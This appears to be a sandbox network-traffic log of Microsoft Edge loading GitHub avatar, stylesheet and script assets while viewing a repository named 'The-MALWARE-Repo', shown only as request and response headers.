x-timer: S1741746992.257451,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: afa61f623d4c3c7290e5e73e6bf81432279d3297
expires: Wed, 12 Mar 2025 02:41:32 GMT
source-age: 1349290
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://avatars.githubusercontent.com/u/63458929?v=4&size=32

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/63458929?v=4&size=32 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "c196706d4b16fc4de4a18f3f3adef187165e237dc8f96492db5297df816b6943"
last-modified: Thu, 20 Jul 2023 19:54:24 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: BB98:A6AD2:101441:20EF5E:67D0F32C
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1741746992.257413,VS0,VE120
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 6adee44cf81ee16301a19f8dc455d64875960710
expires: Wed, 12 Mar 2025 02:41:32 GMT
source-age: 0
vary: Authorization,Accept-Encoding
content-length: 849
GET

https://avatars.githubusercontent.com/u/63458929?s=40&v=4

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/63458929?s=40&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Sat, 07 Mar 2015 10:39:57 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: EEED:3D394C:E4F5E:2381BA:67CABA55
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:40 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1741747001.961120,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 3b906a029415552f2058f818a470a87fc14bcff5
expires: Wed, 12 Mar 2025 02:41:40 GMT
source-age: 407779
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://github.githubassets.com/assets/light-605318cbe3a1.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/light-605318cbe3a1.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Wed, 15 Jan 2025 23:39:42 GMT
etag: "0x8DD35BDE28E1C20"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3012151
x-served-by: cache-iad-kiad7000067-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 27, 15598
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f3d988e6f17bdb88167f9a98e603485ba5ada6d4
content-length: 39273
GET

https://github.githubassets.com/assets/dark-bd1cb5575fff.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/dark-bd1cb5575fff.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 25 Feb 2025 22:42:22 GMT
etag: "0x8DD55EDAB5CE470"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 970694
x-served-by: cache-iad-kcgs7200082-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 43, 14520
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2d9bd7ea203b503b0e3c32ac8a80c741c899c1b3
content-length: 38195
GET

https://github.githubassets.com/assets/primer-primitives-225433424a87.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/primer-primitives-225433424a87.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Sat, 08 Mar 2025 00:08:39 GMT
etag: "0x8DD5DD560DB5A3E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 96672
x-served-by: cache-iad-kcgs7200172-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 79, 2275
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a92c70bac09e7f725164990c715b4e224d58a980
content-length: 21579
GET

https://github.githubassets.com/assets/primer-93aded0ee8a1.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/primer-93aded0ee8a1.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 11 Mar 2025 14:26:39 GMT
etag: "0x8DD60A8BC9F49D4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 38985
x-served-by: cache-iad-kiad7000070-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4, 986
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a8cfe1e47971ada396058a717dd7dbd506fc32fc
content-length: 21876
GET

https://github.githubassets.com/assets/global-21a7f868f707.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/global-21a7f868f707.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 03 Mar 2025 21:33:14 GMT
etag: "0x8DD5A9B011C1A27"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 622630
x-served-by: cache-iad-kiad7000072-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 2, 9548
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 32d929e8fff505f34d5738d302d82689812ca6dc
content-length: 8073
GET

https://github.githubassets.com/assets/github-18e4a57a83e4.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/github-18e4a57a83e4.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 03 Mar 2025 21:33:11 GMT
etag: "0x8DD5A9AFFAE6DF7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 622635
x-served-by: cache-iad-kjyo7100138-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 2, 9636
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c05bc10ed86ac7315345fbb55d401f980c7083be
content-length: 8174
GET

https://github.githubassets.com/assets/primer-react.6dfd00213d4192f8a1a4.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/primer-react.6dfd00213d4192f8a1a4.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 03 Mar 2025 21:33:15 GMT
etag: "0x8DD5A9B01FC085A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 622635
x-served-by: cache-iad-kiad7000140-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 3, 9916
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8323e1e17624ce90931451229fe05678ba5886cc
content-length: 2401
GET

https://github.githubassets.com/assets/code-0210be90f4d3.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/code-0210be90f4d3.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 27 Jan 2025 16:33:51 GMT
etag: "0x8DD3EF06259EC32"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2404472
x-served-by: cache-iad-kjyo7100076-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 96, 11245
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b6ea514958abfe4df1fa24b8028bb30f5b482219
content-length: 5184
GET

https://github.githubassets.com/assets/repository-4fce88777fa8.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/repository-4fce88777fa8.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 17 Jan 2025 17:06:48 GMT
etag: "0x8DD37195443E4FE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3073871
x-served-by: cache-iad-kjyo7100163-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 64, 8778
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0e9f2d53f121a6763f8217f0ac7c662b8ef13172
content-length: 5189
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Thu, 06 Mar 2025 17:41:31 GMT
etag: "0x8DD5CD6218DA075"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 450823
x-served-by: cache-iad-kcgs7200077-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 39, 3708
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: faa2c582c097dbb5d90ba3fb15406927ec0a66b6
content-length: 554
GET

https://github.githubassets.com/assets/repos-overview.0ee7cac3ab511a65d9f9.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/repos-overview.0ee7cac3ab511a65d9f9.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:17 GMT
etag: "0x8DCC5ED35736954"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2986143
x-served-by: cache-iad-kjyo7100115-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 44, 10424
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ac9c5c53c6bcb8c8462abd526a96ee96f4e06a99
content-length: 479
GET

https://github.githubassets.com/assets/wp-runtime-fd4fd9da8c67.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/wp-runtime-fd4fd9da8c67.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 03 Jan 2025 21:10:51 GMT
etag: "0x8DD2C3B1AB7B5CF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2478120
x-served-by: cache-iad-kjyo7100116-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 62, 15217
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b00913ec78588471b6b1ac8a1f81f8ee71f8cb1c
content-length: 5794
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FBFE222"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3523275
x-served-by: cache-iad-kiad7000130-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 49193, 15045
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5de76ec3f1dd710d159e8f8780274426f0f3a2ab
content-length: 4848
GET

https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:53 GMT
etag: "0x8DD4BAB21C35645"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2199443
x-served-by: cache-iad-kiad7000150-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 34, 15603
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1a08f891b0f4fb155eaa8555b8aa85c72e3e9c9e
content-length: 783
GET

https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-4600dbf2d60a.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_failbot_failbot_ts-4600dbf2d60a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E029647C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2979784
x-served-by: cache-iad-kiad7000023-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 1076, 14995
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c3137188edbdc257bf0122214e3ab1857bcf29db
content-length: 3080
GET

https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/environment-f04cb2a9fc8c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 21:54:47 GMT
etag: "0x8DD60E7576B4BCF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 15671
x-served-by: cache-iad-kiad7000075-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 40, 258
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c84739f95b9c72b554b8a36d5eeefc089beffd64
content-length: 14517
GET

https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 13 Feb 2025 15:15:00 GMT
etag: "0x8DD4C412F6B5B64"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1882260
x-served-by: cache-iad-kcgs7200089-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 1719, 15646
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: eeeb9f250b0da0010a9d8e7ac5ff548ebdc3e98d
content-length: 3636
GET

https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

msedge.exe
